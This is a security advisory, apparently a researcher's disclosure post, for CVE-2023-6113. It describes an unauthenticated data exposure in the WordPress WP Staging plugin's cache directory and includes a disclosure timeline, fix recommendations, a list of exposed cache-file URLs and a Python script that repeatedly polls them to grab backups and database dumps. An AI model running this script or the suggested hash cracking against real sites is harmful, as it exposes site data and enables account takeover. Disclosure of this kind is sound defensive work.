CVE-2023-6113 – WP Staging – Unauth Sensitive Data Exposure to Account Takeover – POC/Exploit

A critical vulnerability has been uncovered in the WP Staging plugin within the directory /wordpress/wp-content/uploads/wp-staging/cache. This vulnerability exposes comprehensive information about the site, including its configuration, directories, and files. More alarmingly, it allows unauthorized access to sensitive data within the database, making it a high-risk security flaw. Exploiting this vulnerability can lead to severe consequences, including potential brute force attacks on password hashes and the compromise of the entire system.

Main info:

CVE	CVE-2023-6113
Plugin	WP Staging (Free < 3.1.3, Pro < 5.1.3)
Critical	Super High
All Time	2 791 059
Active installations	80 000+
Publicly Published	December 8, 2023
Last Updated	December 8, 2023
Researcher	Dmtirii Ignatyev
OWASP TOP-10	A3: Sensitive Data Exposure
PoC	Yes
Exploit	Yes
Reference	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6113 https://wpscan.com/vulnerability/5a71049a-09a6-40ab-a4e8-44634869d4fb/
Plugin Security Certification by CleanTalk

Timeline

November 10, 2023	Plugin testing and vulnerability detection in the WP Staging plugin have been completed
November 10, 2023	I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
November 15, 2023	The author fixed the vulnerability and released the plugin update
November X, 2023	Registered CVE-2023-6113

Discovery of the Vulnerability

A severe vulnerability has been discovered in the directory /wordpress/wp-content/uploads/wp-staging/cache. This flaw not only exposes extensive information about the site, including its configuration, directories, and files, but more critically, it provides unauthorized access to sensitive data within the database and all data inside. Exploiting this vulnerability poses an imminent threat, leading to potential brute force attacks on password hashes and, subsequently, the compromise of the entire system.

Understanding of Directory Listing / Account Takeover attack’s

Directory listing refers to the capability of a web server to display the contents of a directory when an index file is absent. In WordPress, this feature can inadvertently expose sensitive information if not properly configured. In the case of the WP Staging plugin, the vulnerability lies in the directory /wordpress/wp-content/uploads/wp-staging/cache, where directory listing is not adequately controlled. Real-world examples demonstrate that attackers can exploit this flaw to gain insight into the site’s structure and, more importantly, access sensitive data.

Exploiting the Directory Listing Vulnerability

Exploiting the WP Staging vulnerability involves leveraging the exposed directory listing to gain unauthorized access to sensitive data. Attackers can use this information to target specific files, including those containing password hashes. With access to password hashes, attackers may launch brute force attacks, attempting to crack passwords and gain control of user accounts, potentially leading to a full account takeover.

POC:

1) The plugin has the ability to automatically backup every 12 hours (in free version only in 00:00 – attacker can start exploit at 23:55), but for the speed of the POC, I will do it manually, but this is similar to automatic scanning.

2) There is a lot of sensitive data and most importantly, you can download a backup file and upload it to your local car:

“http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_filesystem_scan.cache”,

“http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_file_task_uploads.cache”,

“http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_database.cache”,

“http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_site_requirements_check.cache”,

“http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/jobCache_backup_job.cache”,

“http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_file_task_plugins.cache”,

“http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_file_task_uploads.cache”,

“http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_file_task_themes.cache”,

“http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_filesystem_scan.cache”,

“http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_file_task_otherfiles.cache”,

“http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_site_requirements_check.cache”,

“http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_file_task_muplugins.cache”,

“http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_file_task_otherfiles.cache”,

“http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_file_task_plugins.cache”,

“http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_file_task_muplugins.cache”,

“http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_database.cache”,

“http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_file_task_themes.cache”

3) You can downlaod this backups/127.0.0.1_20231113-115916_652cf1eb0541.wpstg -> form http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/jobCache_backup_job.cache

EXPLOIT (python3):

import requests
import time
import threading

urls = [
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_filesystem_scan.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_file_task_uploads.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_database.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_site_requirements_check.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/jobCache_backup_job.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_file_task_plugins.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_file_task_uploads.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_file_task_themes.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_filesystem_scan.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_file_task_otherfiles.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_site_requirements_check.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_file_task_muplugins.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_file_task_otherfiles.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_file_task_plugins.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_file_task_muplugins.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/task_steps_backup_database.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/cache/backup_file_task_themes.cache"
]

print("The following links are checked:")
for url in urls:
    print(url)

def check_url(url):
    while True:
        try:
            response = requests.get(url)
            if response.status_code == 200:
                print(f"File at {url} found! I display the contents...")
                print(response.text)
        except requests.RequestException as e:
            print(f"Error when requesting to {url}: {e}")

        time.sleep(0.5)

for url in urls:
    thread = threading.Thread(target=check_url, args=(url,))
    thread.start()

___

The potential risk associated with this vulnerability is severe. In real-world scenarios, attackers can exploit the exposed directory to perform reconnaissance on the site’s structure and locate critical files. Subsequently, they may target the database to retrieve sensitive information, compromising user data, passwords, and potentially gaining control of administrative accounts. This could lead to unauthorized access, data manipulation, and other malicious activities.

Recommendations for Improved Security

• Directory Indexing Configuration: Disable directory indexing for sensitive directories, ensuring that web servers do not disclose the contents of directories.
• Regular Security Audits: Conduct regular security audits to identify and address vulnerabilities promptly.
• Plugin Patching: Ensure that the WP Staging plugin is up-to-date with the latest security patches to address this vulnerability.
• Database Encryption: Implement encryption for sensitive data stored in the database to protect it even if unauthorized access occurs.

By implementing these security measures, administrators can significantly reduce the risk of unauthorized access and data exposure associated with the WP Staging vulnerability.

#WordPressSecurity #DirectoryListing #WebsiteSafety #StayProtected #SuperHighVulnerability

Use CleanTalk solutions to improve the security of your website

DMITRII I.